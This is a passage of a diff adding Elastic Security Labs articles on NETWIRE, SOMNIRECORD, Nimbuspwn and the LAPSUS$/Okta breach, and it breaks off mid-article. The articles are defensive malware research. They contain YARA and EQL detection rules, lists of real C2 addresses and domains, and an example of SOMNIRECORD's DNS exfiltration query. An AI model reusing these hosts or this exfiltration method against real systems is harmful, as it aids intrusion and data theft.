+ ],
+ "tags": [
+ "malware analysis",
+ "naplistener",
+ "siestagraph"
+ ]
+ },
+ "id": "security_labs_content-naplistener_more_bad_dreams_from_the_developers_of_siestagraph-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-netwire_configuration_extractor-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-netwire_configuration_extractor-md.json
new file mode 100644
index 00000000000..d804ccc82e5
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-netwire_configuration_extractor-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"NETWIRE Configuration Extractor\"\nslug: \"netwire-configuration-extractor\"\ndate: \"2023-01-27\"\nsubtitle: \"Configuration extraction tool for the NETWIRE malware.\"\ndescription: \"Python script to extract the configuration from NETWIRE samples.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"tools-image.jpg\"\ncategory:\n - slug: tools\ntags:\n - netwire\n - ref9965\n---\n\nPython script to extract the configuration from NETWIRE samples.\n\n[Download netwire-configuration-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdcef1d05d2077d05/63d43627c31a7126813ff8b6/netwire-configuration-extractor.tar.gz)\n\n> For information on the NETWIRE malware, check out the following resources:\n>\n> - [NETWIRE Dynamic Configuration Extraction](https://www.elastic.co/security-labs/netwire-dynamic-configuration-extraction)\n\n## Getting started\n\n### Docker\n\nThe recommended and easiest way to get going is to use Docker. From the directory this README is in, you can build a local container.\n\n```\ndocker build . -t netwire_loader_config_extractor\n```\n\nThen we run the container with the **-v** flag to map a host directory to the Docker container directory.\n\n```\ndocker run -ti --rm -v $(pwd)/data:/data netwire_loader_config_extractor:latest --help\n```\n\n### Running it locally\n\nAs mentioned above, Docker is the recommended approach to running this project; however, you can also run it locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. 
This will set up a virtual environment, install the dependencies, activate the virtual environment, and run the console script.\n\n```\npoetry lock\npoetry install\npoetry shell\nnetwire-config-extractor --help\n```\n\n## Usage\n\nAll samples need to be unpacked prior to extraction attempts.\n\nOur extractor takes either a directory of samples with the **-d** option or a single sample with **-f**, and can then output notable parts of the configuration, specifically:\n\n- **-k** : extract the encryption keys\n- **-c** : extract the C2 information\n- **-s** : extract the wide-character strings\n- **-a** : extract the ASCII character strings\n\n```\ndocker run -ti --rm -v $(pwd)/data:/data netwire_loader_config_extractor:latest -d \"C:\\tmp\\samples\"\n```\n\n\n\nYou can collect the extracted configurations from the directory you set when running the extractor.\n"
+ },
+ "title": "NETWIRE Configuration Extractor",
+ "slug": "netwire-configuration-extractor",
+ "subtitle": "Configuration extraction tool for the NETWIRE malware.",
+ "date": "2023-01-27",
+ "description": "Python script to extract the configuration from NETWIRE samples.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "tools-image.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "netwire",
+ "ref9965"
+ ]
+ },
+ "id": "security_labs_content-netwire_configuration_extractor-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-netwire_dynamic_configuration_extraction-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-netwire_dynamic_configuration_extraction-md.json
new file mode 100644
index 00000000000..0661216d05f
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-netwire_dynamic_configuration_extraction-md.json
@@ -0,0 +1,32 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"NETWIRE Dynamic Configuration Extraction\"\nslug: \"netwire-dynamic-configuration-extraction\"\ndate: \"2023-01-30\"\nsubtitle: \"A tool for the dynamic extraction of NETWIRE configurations based on emulation.\"\ndescription: \"Elastic Security Labs discusses the NETWIRE trojan and is releasing a tool to dynamically extract configuration files.\"\nauthor:\n - slug: seth-goodwin\n - slug: salim-bitam\nimage: \"lock-code-combination-configuration.jpg\"\ncategory:\n - slug: security-research\ntags:\n - netwire\n - ref9965\n---\n\n## Key takeaways\n\n- NETWIRE has shown an increase in prevalence over the last year\n- Elastic Security Labs created an extractor to pull out configuration data from NETWIRE files and memory dumps targeting the functions the malware uses to extract its encrypted data\n- The NETWIRE extractor is freely available for download\n\n> To download the NETWIRE configuration extractor, check out our post on the tool:\n>\n> - [NETWIRE configuration extractor](https://www.elastic.co/security-labs/netwire-configuration-extractor)\n\n## Preamble\n\n[NETWIRE](https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire) is a Remote Access Tool (RAT) that has been used since at least 2014. It is a publicly available commodity malware and has been observed being used by financially motivated and nation-state actors.\n\n\n\nIn the second half of 2022, we noticed an uptick in the prevalence of NETWIRE usage in our telemetry data. This prompted the Elastic Security Labs team to develop a configuration extractor to assist the security community in collecting atomic indicators within the configurations. 
Using this extractor will support threat tracking and improve detection, prevention, and response times.\n\n## Extractor\n\nThe NETWIRE RAT uses the [RC4 symmetric encryption](https://en.wikipedia.org/wiki/RC4) algorithm to protect its configuration, which is encrypted in the **.data** section along with the 16-byte RC4 decryption key.\n\nWhile reversing our samples, the analysts noticed that for both the **crypto::rc4_init_sbox** and **crypto::rc4_decrypt** functions, the second argument (#2 in the image below) is always a memory address for the desired encrypted configuration value, and the third argument (#3) is an immediate value written to the memory stack before the call, which represents the size of the encrypted string.\n\nIt was also noted that the function calls are one after the other. This is important to allow us to structure the extractor to look for these functions sequentially.\n\n\n\nWith **$key** (from the above image) in mind, we created YARA rules to identify the location of the key and encrypted configuration values.\n\nThe extractor uses these rules to:\n\n1. Locate the function responsible for decrypting the configuration using YARA.\n2. Disassemble the function using Capstone.\n3. Extract the RC4 key address and the encrypted configuration field addresses.\n4. Extract the size of the configuration field.\n5. 
RC4 decrypt the encrypted fields and rebuild the configuration.\n\n\n\nThe extracted configuration includes the following fields:\n\n- **…** : registry key to achieve persistence.\n- **C2 IP list** : List of command and control (C2) server domains or IP addresses.\n- **Host ID** : A unique identifier that is assigned to the infected machine.\n- **Installation path** : The location where the malware will be installed.\n- **Keylogger logs directory** : The location where the keylogging log file will be stored.\n- **Mutex** : Mutex name, to create a synchronization object to ensure only one instance of the sample is running on the machine.\n- **Password** : Static password to generate the AES key used for encrypting the communication between the malware and the C2 server.\n- **Run registry key entry** : Name of the entry in the [run registry](https://attack.mitre.org/techniques/T1547/001/), used for persistence.\n- **Sleep in seconds** : The amount of time the malware sleeps.\n\n\n\nThe configuration extractor accepts four parameters:\n\n- **-f** : to specify a single NETWIRE sample\n- **-d** : to specify a directory of NETWIRE samples\n- **-o** : to write the configuration in JSON format to the specified file\n- **--all-config** : to print the unparsed raw decrypted configuration\n\n## Analysis\n\nWe’ve used this extractor to examine a set of samples from the previous 180 days to extract indicators for further enrichment and analysis.\n\nOur initially collected batch of samples came as a mixture of executable files and memory dumps. The extractor will only work on unmapped files, so the dumps, which were already mapped, were run through [**pe_unmapper**](https://github.com/hasherezade/pe_unmapper).\n\nWhen extracting a payload from memory, we are obtaining a memory-mapped version of it. This means that the **\"Raw Address\"** and **\"Raw Size\"** may not be correctly aligned with the correct section’s data. 
To correctly align the PE file, it is necessary to adjust the pointer to the raw address so that it matches the virtual address for every section.\n\nNow we can run the configuration extractor with [Poetry](https://python-poetry.org/) against our directory of unmapped binaries:\n\n```\npoetry lock\npoetry install\npoetry shell\nnetwire-config-extractor -d sample-dir/ -o output.ndjson\n```\n\nThis file, **output.ndjson**, can then be uploaded to Kibana for further analysis.\n\n> Check out the [Elastic Container project](https://www.elastic.co/security-labs/the-elastic-container-project) to quickly spin up an Elastic Stack and start analyzing structured security-relevant data.\n\n\n\nNext time you run into a NETWIRE sample, run it through our configuration extractor to pull out other indicators to help you on your analytic journey or begin remediating more quickly.\n\n## Detection\n\n### YARA\n\nThese YARA rules can be used to detect and identify the NETWIRE RAT.\n\n```\nrule Windows_Trojan_Netwire_1 {\n meta:\n author = \"Elastic Security\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"Netwire\"\n threat_name = \"Windows.Trojan.Netwire\"\n strings:\n $a = { 0F B6 74 0C 10 89 CF 29 C7 F7 C6 DF 00 00 00 74 09 41 89 F3 88 5C }\n condition:\n all of them\n}\nrule Windows_Trojan_Netwire_2 {\n meta:\n author = \"Elastic Security\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"Netwire\"\n threat_name = \"Windows.Trojan.Netwire\"\n strings:\n $a1 = \"[%.2d/%.2d/%d %.2d:%.2d:%.2d]\" fullword\n $a2 = \"\\\\Login Data\"\n $a3 = \"SOFTWARE\\\\NetWire\" fullword\n condition:\n 2 of them\n}\nrule Windows_Trojan_Netwire_3 {\n meta:\n author = \"Elastic Security\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"Netwire\"\n threat_name = \"Windows.Trojan.Netwire\"\n strings:\n $a = { C9 0F 44 C8 D0 EB 8A 44 24 12 0F B7 C9 75 D1 32 C0 B3 01 8B CE 88 44 }\n condition:\n all of 
them\n}\nrule Windows_Trojan_Netwire_4 {\n meta:\n author = \"Elastic Security\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"Netwire\"\n threat_name = \"Windows.Trojan.Netwire\"\n strings:\n $a1 = \"http://%s%ComSpec\" ascii fullword\n $a2 = \"%c%.8x%s\" ascii fullword\n $a3 = \"%6\\\\6Z65dlNh\\\\YlS.dfd\" ascii fullword\n $a4 = \"GET %s HTTP/1.1\" ascii fullword\n $a5 = \"R-W65: %6:%S\" ascii fullword\n $a6 = \"PTLLjPq %6:%S -qq9/G.y\" ascii fullword\n condition:\n 4 of them\n}\n```\n\n## Indicators\n\nAll indicators are also available [for download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte3d9f2700cdf6637/63d3f854e4e29e75dc5de351/9965-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n\nThe following indicators were discussed in this research.\n\n| Indicator | Type | Note |\n| -------------------------------------- | ----------- | -------------- |\n| 139.28.38[.]235 | ipv4-addr | NETWIRE RAT C2 |\n| 149.102.132[.]253 | ipv4-addr | NETWIRE RAT C2 |\n| 184.75.221[.]115 | ipv4-addr | NETWIRE RAT C2 |\n| 185.136.165[.]182 | ipv4-addr | NETWIRE RAT C2 |\n| 185.140.53[.]139 | ipv4-addr | NETWIRE RAT C2 |\n| 185.140.53[.]144 | ipv4-addr | NETWIRE RAT C2 |\n| 185.140.53[.]154 | ipv4-addr | NETWIRE RAT C2 |\n| 185.140.53[.]61 | ipv4-addr | NETWIRE RAT C2 |\n| 185.216.71[.]251 | ipv4-addr | NETWIRE RAT C2 |\n| 194.36.111[.]59 | ipv4-addr | NETWIRE RAT C2 |\n| 194.5.98[.]126 | ipv4-addr | NETWIRE RAT C2 |\n| 194.5.98[.]178 | ipv4-addr | NETWIRE RAT C2 |\n| 194.5.98[.]188 | ipv4-addr | NETWIRE RAT C2 |\n| 194.5.98[.]65 | ipv4-addr | NETWIRE RAT C2 |\n| 212.193.29[.]37 | ipv4-addr | NETWIRE RAT C2 |\n| 212.193.30[.]230 | ipv4-addr | NETWIRE RAT C2 |\n| 213.152.161[.]249 | ipv4-addr | NETWIRE RAT C2 |\n| 217.151.98[.]163 | ipv4-addr | NETWIRE RAT C2 |\n| 23.105.131[.]166 | ipv4-addr | NETWIRE RAT C2 |\n| 37.0.14[.]199 | ipv4-addr | NETWIRE RAT C2 |\n| 37.0.14[.]203 | ipv4-addr | NETWIRE RAT C2 |\n| 
37.0.14[.]206 | ipv4-addr | NETWIRE RAT C2 |\n| 37.0.14[.]208 | ipv4-addr | NETWIRE RAT C2 |\n| 37.0.14[.]214 | ipv4-addr | NETWIRE RAT C2 |\n| 37.120.217[.]243 | ipv4-addr | NETWIRE RAT C2 |\n| 51.161.104[.]138 | ipv4-addr | NETWIRE RAT C2 |\n| 54.145.6[.]146 | ipv4-addr | NETWIRE RAT C2 |\n| 80.66.64[.]136 | ipv4-addr | NETWIRE RAT C2 |\n| 85.209.134[.]105 | ipv4-addr | NETWIRE RAT C2 |\n| 85.31.46[.]78 | ipv4-addr | NETWIRE RAT C2 |\n| 94.156.35[.]40 | ipv4-addr | NETWIRE RAT C2 |\n| 20220627.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| admin96.hopto[.]org | domain-name | NETWIRE RAT C2 |\n| alice2019.myftp[.]biz | domain-name | NETWIRE RAT C2 |\n| asorock1111.ddns[.]net | domain-name | NETWIRE RAT C2 |\n| banqueislamik.ddrive[.]online | domain-name | NETWIRE RAT C2 |\n| betterday.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| bigman2021.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| blazeblaze.ddns[.]net | domain-name | NETWIRE RAT C2 |\n| chongmei33.myddns[.]rocks | domain-name | NETWIRE RAT C2 |\n| clients.enigmasolutions[.]xyz | domain-name | NETWIRE RAT C2 |\n| gracedynu.gleeze[.]com | domain-name | NETWIRE RAT C2 |\n| ingobea.hopto[.]org | domain-name | NETWIRE RAT C2 |\n| iphanyi.edns[.]biz | domain-name | NETWIRE RAT C2 |\n| iphy.strangled[.]net | domain-name | NETWIRE RAT C2 |\n| kimlee11.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| loffgghh.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| megaton.gleeze[.]com | domain-name | NETWIRE RAT C2 |\n| moran101.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| netuwaya.servecounterstrike[.]com | domain-name | NETWIRE RAT C2 |\n| nowancenorly.ddns[.]net | domain-name | NETWIRE RAT C2 |\n| podzeye.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| podzeye2.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| recoveryonpoint.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| redlinea[.]top | domain-name | NETWIRE RAT C2 |\n| roller.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| 
rozayleekimishere.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| sani990.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| saturdaylivecheckthisout.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| uhie.hopto[.]org | domain-name | NETWIRE RAT C2 |\n| uhie2020.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| wcbradley.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| xman2.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| zonedx.ddns[.]net | domain-name | NETWIRE RAT C2 |\n"
+ },
+ "title": "NETWIRE Dynamic Configuration Extraction",
+ "slug": "netwire-dynamic-configuration-extraction",
+ "subtitle": "A tool for the dynamic extraction of NETWIRE configurations based on emulation.",
+ "date": "2023-01-30",
+ "description": "Elastic Security Labs discusses the NETWIRE trojan and is releasing a tool to dynamically extract configuration files.",
+ "author": [
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "lock-code-combination-configuration.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ],
+ "tags": [
+ "netwire",
+ "ref9965"
+ ]
+ },
+ "id": "security_labs_content-netwire_dynamic_configuration_extraction-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-nimbuspwn_leveraging_vulnerabilities_to_exploit_linux_via_privilege_escalation-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-nimbuspwn_leveraging_vulnerabilities_to_exploit_linux_via_privilege_escalation-md.json
new file mode 100644
index 00000000000..c599a6709d0
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-nimbuspwn_leveraging_vulnerabilities_to_exploit_linux_via_privilege_escalation-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Nimbuspwn: Leveraging vulnerabilities to exploit Linux via Privilege Escalation\"\nslug: \"nimbuspwn-leveraging-vulnerabilities-to-exploit-linux-via-privilege-escalation\"\ndate: \"2022-06-02\"\ndescription: \"Microsoft 365 Defender team released a post detailing several identified vulnerabilities. These vulnerabilities allow adversarial groups to escalate privileges on Linux systems, allowing for deployment of payloads, ransomware, or other attacks.\"\nauthor:\n - slug: jake-king\nimage: \"thumb-report-threat-hunting.png\"\ncategory:\n - slug: security-research\n---\n\n## Summary\n\nThe Microsoft 365 Defender team released a [post](https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/) detailing several identified vulnerabilities. These vulnerabilities allow adversarial groups to easily escalate privileges on Linux systems, allowing for deployment of payloads, ransomware, or other malicious actions. Collectively known as Nimbuspwn, these vulnerabilities include a series of security issues within networkd-dispatcher, specifically directory traversal, symlink race, and [TOCTU](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use) race conditions.\n\nDetails are covered in their [detailed post](https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/), and further information will be available within the two requested CVEs: [CVE-2022-29799](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29799) and [CVE-2022-29800](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29800). At the time of publication these CVE IDs are still reserved.\n\nWhile this class of vulnerability requires local shell access to exploit, it should be considered important for those that currently leverage networkd-dispatcher within their Linux workload environments. 
A patch by the creator has been released to resolve the issue under the guidance of Microsoft, and should be applied by those that have systems impacted by this vulnerability.\n\n## Detecting Nimbuspwn activity within Elastic\n\nOur research team at Elastic has focused on building out a series of initial detections that leverage Elastic Security, alongside OSquery.\n\nFirstly, those wishing to understand what systems in their environment may be impacted need to determine systems that have networkd-dispatcher installed:\n\n\n\nWriting an OSquery search that returns the installed version of Networkd-Dispatcher is relatively trivial, and the systems that may be at risk can be identified at a glance. In the screenshot above, we can see an example host listed with a version number of 2.1-2, specific to Ubuntu. The version installed within your environment may be slightly different depending on the distribution. An example query for Debian-based systems has been provided below; on RPM-based distributions, query the rpm_packages table instead.\n\n```\nSELECT version FROM deb_packages WHERE name = 'networkd-dispatcher';\n```\n\nWe leveraged the initial research paper from Microsoft, determining a specific malicious pattern adversaries may use to exploit this vulnerability:\n\n\n\nThe Elastic Security team wrote an EQL Detection Rule to detect suspicious child processes of Networkd-Dispatcher. Any child process detected by this rule should be considered highly suspicious given the circumstances, and should be investigated. Further analysis will likely be provided as our security community builds more POCs for this exploit. An example query appears below:\n\n```\nprocess where event.type == \"start\" and process.parent.name : \"networkd-dispatcher\" and not process.name in (\"networkctl\", \"networkd-dispatcher\")\n```\n\nGiven the nature of this exploit, we expect far greater diversity in POCs over the coming weeks. 
You can expect updates in the form of further signatures or rules accordingly.\n\n## Defensive recommendations\n\nOrganizations impacted by vulnerabilities discovered by the Microsoft team should follow the guidance provided by Microsoft in their initial post, and update their instances of networkd-dispatcher. Elastic recommends investigating hosts that are found to be running vulnerable versions of networkd-dispatcher with the aforementioned detections for any sign of compromise.\n\nNot already using Elastic Security? You can always get started with a [free 14-day trial](https://cloud.elastic.co/registration) of Elastic Cloud.\n"
+ },
+ "title": "Nimbuspwn: Leveraging vulnerabilities to exploit Linux via Privilege Escalation",
+ "slug": "nimbuspwn-leveraging-vulnerabilities-to-exploit-linux-via-privilege-escalation",
+ "date": "2022-06-02",
+ "description": "Microsoft 365 Defender team released a post detailing several identified vulnerabilities. These vulnerabilities allow adversarial groups to escalate privileges on Linux systems, allowing for deployment of payloads, ransomware, or other attacks.",
+ "author": [
+ {
+ "slug": "jake-king"
+ }
+ ],
+ "image": "thumb-report-threat-hunting.png",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-nimbuspwn_leveraging_vulnerabilities_to_exploit_linux_via_privilege_escalation-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-not_sleeping_anymore_somnirecords_wakeup_call-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-not_sleeping_anymore_somnirecords_wakeup_call-md.json
new file mode 100644
index 00000000000..2d4553abd2f
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-not_sleeping_anymore_somnirecords_wakeup_call-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Not sleeping anymore: SOMNIRECORD's wake-up call\"\nslug: \"not-sleeping-anymore-somnirecords-wakeup-call\"\ndate: \"2023-03-22\"\ndescription: \"Elastic Security Labs researchers identified a new malware family written in C++ that we refer to as SOMNIRECORD. This malware functions as a backdoor and communicates with command and control (C2) while masquerading as DNS.\"\nauthor:\n - slug: salim-bitam\nimage: \"blog-thumb-steel-engine.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - malware analysis\n - somnirecord\n - siestagraph\n - naplistener\n---\n\n### Introduction\n\nWhile monitoring the [REF2924 activity group](https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns), Elastic Security Labs researchers identified a new malware family written in C++ that we refer to as SOMNIRECORD. This malware functions as a backdoor and communicates with command and control (C2) while masquerading as DNS, allowing attackers to bypass network security controls such as firewalls and intrusion detection systems. Like [NAPLISTENER](https://www.elastic.co/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph) and [SIESTAGRAPH](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry), these factors make it difficult to detect and block using strictly network-based technologies.\n\n### Analysis\n\nUpon execution, SOMNIRECORD first generates a random string of three characters used as a unique identifier for the running malware instance. It then probes a domain name that is hardcoded into the binary (\" `dafadfweer.top`\") by appending the random three-character string and the string \" `-PROBE`\" to the domain name. 
SOMNIRECORD simulates a DNS query to retrieve the number of commands that are queued for the backdoor to execute, each stored in a `TXT` record of the associated domain.\n\n\n\n\n\nAfter obtaining the number of commands waiting to be executed, the backdoor retrieves each command individually by sending a DNS query for a `TXT` record. The backdoor prepends the previously-generated random string to the \" `-CMD`\" string before sending the DNS query. This allows the backdoor to receive each command individually and execute them accordingly.\n\n\n\n### Command handling\n\nThe malware's command handling function is a critical component that enables it to execute commands received from the C2 server. This function processes the command and performs the appropriate action based on the command type. In this malware, there are five commands that the malware can execute: `SYS, PSL, sleep, ECM` , and `WS` :\n\n\n\n“ `SYS` ” is used to retrieve information about the infected machine. When this command is executed, the SOMNIRECORD payload collects information about the computer name, the number of processors, OEM ID, and processor type. This information can be used to fingerprint/identify specific infected machines.\n\n“ `PSL` ” is used to list all processes currently running on the infected machine by executing the system command “tasklist”.\n\n“ `ECM` ” allows the malware to execute any software already present on the system, such as cmd.exe.\n\n“ `sleep` ” is used to change the beacon interval to the c2 server.\n\n“ `WS` ” is used to deploy an ASPX-based webshell to a specified path. The ASPX is hardcoded into the malware itself.\n\nTo communicate command results to its C2 server, SOMNIRECORD employs a unique technique that involves encoding the output of executed commands as hex values, prepending the previously generated random string to the \" `-DATA`\" string and then appending the hex values. 
The malware then performs a DNS query to the subdomain, allowing the encoded command output to be transmitted to the C2 server for example: `XXX-DATA-68656c6c6f20776f726c64.dafadfweer.top`\n\n\n\n### Resources\n\nElastic Security Labs has provided a SOMNIRECORD signature in our open protections artifact repository [here](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_SomniRecord.yar).\n\n### Sources\n\nCode similarity analyses play an important role in discovering the sources of malicious code used by adversaries. In an effort to identify the source of SOMNIRECORD, we identified an open source project called [DNS-Persist](https://github.com/chouaibhm/DNS-Persist/) that contained similar logic. Like NAPLISTENER, we believe the attacker was inspired by this project and then added modifications to facilitate success in a specific target environment.\n\n### Key takeaways\n\n- The use of open source projects by the attacker indicates that they are taking steps to customize existing tools for their specific needs and may be attempting to counter attribution attempts\n- SOMNIRECORD uses DNS to pattern communication with its command and control (C2), which enables attackers to bypass network egress controls and monitoring\n"
+ },
+ "title": "Not sleeping anymore: SOMNIRECORD's wake-up call",
+ "slug": "not-sleeping-anymore-somnirecords-wakeup-call",
+ "date": "2023-03-22",
+ "description": "Elastic Security Labs researchers identified a new malware family written in C++ that we refer to as SOMNIRECORD. This malware functions as a backdoor and communicates with command and control (C2) while masquerading as DNS.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "blog-thumb-steel-engine.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "malware analysis",
+ "somnirecord",
+ "siestagraph",
+ "naplistener"
+ ]
+ },
+ "id": "security_labs_content-not_sleeping_anymore_somnirecords_wakeup_call-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-okta_and_lapsus_what_you_need_to_know-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-okta_and_lapsus_what_you_need_to_know-md.json
new file mode 100644
index 00000000000..6751253080a
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-okta_and_lapsus_what_you_need_to_know-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Okta and LAPSUS$: What you need to know\"\nslug: \"okta-and-lapsus-what-you-need-to-know\"\ndate: \"2022-06-02\"\ndescription: \"The latest organization under the microscope of the LAPSUS$ group is Okta. Threat hunt for the recent breach targeting Okta users using these simple steps in Elastic\"\nauthor:\n - slug: jake-king\nimage: \"blog-security-detection-720x420.png\"\ncategory:\n - slug: activity-group\n---\n\n> Readers' Note:\n>\n> Elastic has undergone a series of investigations internally and has not yet identified malicious actions that may pertain to this event. Okta has also released two statements relating to the incident in question that may be reviewed [here](https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/) and [here](https://www.okta.com/blog/2022/03/okta-official-statement-on-lapsus-claims/).\n\n## The LAPSUS$ group\n\nFinancially motivated adversary groups executing ransomware attacks have rightfully gotten our attention in recent years. Similar to LulzSec, there’s a new group catching attention with different motivations, targeting larger organizations.\n\nThe LAPSUS$ group emerged onto the scene a number of months ago, targeting high-profile organizations such as Nvidia, Samsung, and Ubisoft — making various demands that, in some cases, resulted in either data dumps or screenshots of internal systems shared via the group’s Telegram account. These were sometimes determined by user-voted polls within the group, suggesting that this is only the beginning of a series of attacks the group is undertaking more frequently as they gain press coverage.\n\nGroups of this nature focus on data theft and extortion via social engineering — commonly, targeted spear phishing campaigns.\n\nThe latest organization under the microscope of the LAPSUS$ group is Okta, the identity provider for thousands of companies of all sizes. 
Surprisingly, LAPSUS$ chose to note in their release of information that their targeting of Okta was not for access to Okta’s systems, but rather that of their customers:\n\n\n\n## The latest target: Okta\n\nAfter LAPSUS$ sent a notification last night to the Telegram account, Okta’s CEO responded with a series of Tweets and an [official statement](https://sec.okta.com/articles/2022/03/official-okta-statement-lapsus-claims) regarding the suspected compromise, stating that it occurred in January 2022, similar to dates visible in the screenshots from the Telegram post:\n\n\n\n\n\n\n\n\n\n\n\nWhile the initial notice provided some insights into potential scope and timing of the incident, many customers are still interested in identifying the scope of the access, and how to assess if there is any local impact within their organization.\n\nThe updated notice released by Okta suggested that access was limited to a specific end-user system with no ability to create or delete users or download customer information. However, it did have the ability to reset passwords and MFA tokens for users, while not obtaining access to them. Responses from LAPSUS$ are included for context, and suggest more may need to be investigated.\n\nIn the third update notification shared by David Bradbury at Okta, a correction was made indicating that a small portion (2.5%) of the customer base was potentially impacted by the incident. Further details will be shared via a webinar scheduled for 8 AM PDT on Wednesday, March 23rd. A link to sign up for the webinar is located within the [aforementioned update post.](https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/)\n\nAs more information pertaining to the breach is released by either LAPSUS$ or Okta, we will maintain the accuracy of information shared within this post.\n\n## Threat hunting Okta logs in Elastic\n\nThe good news is that customers of Okta do have access to relatively comprehensive log information regarding activity within their account. 
Okta has configured a default 90-day retention window for system events. Okta [released an updated statement](https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/) stating customers do not have to respond to the incident immediately, but for those wishing to investigate further, the following threat hunting information is still valuable.\n\nThe process to get started with ingesting Okta logs is simple — a prebuilt integration for Okta Log ingestion is available as a one-click module configurable within Kibana:\n\n\n\nAlternatively, the [Okta Filebeat Module](https://www.elastic.co/guide/en/beats/filebeat/master/filebeat-module-okta.html#filebeat-module-okta) can easily be added to Elastic to provide insights into previous account activity.\n\nConfiguring the Okta Module is simple, provided you tweak the initial_interval value to 90 days:\n\n```\n~ ~ ~\n- module: okta\n system:\n var.url: https://yourOktaDomain/api/v1/logs\n var.api_key: 'XXXX-XXXX...XXXX-XXXX'\n var.initial_interval: 90d # will fetch events starting 90 days ago.\n~ ~ ~\n```\n\n\n\nOnce events are ingested, a number of Lucene queries are easily leveraged for early/initial signs of compromise. While these are not a comprehensive set of queries, they should provide ample detail for any security team to investigate potential suspicious activity:\n\nMFA device reset via console for any user:\n\n###### event.module:\"okta\" AND event.action:\"user.mfa.factor.reset_all\"\n\nUser account primary email updated to a new value:\n\n###### event.module:\"okta\" AND event.action:\"user.account.update_primary_email\"\n\nUser Privilege granted for an account within your Okta organization:\n\n###### event.module:\"okta\" AND event.action:\"user.account.privilege.grant\"\n\nOkta Administrative staff have a series of privileges that allow for user-impersonation via their management service. 
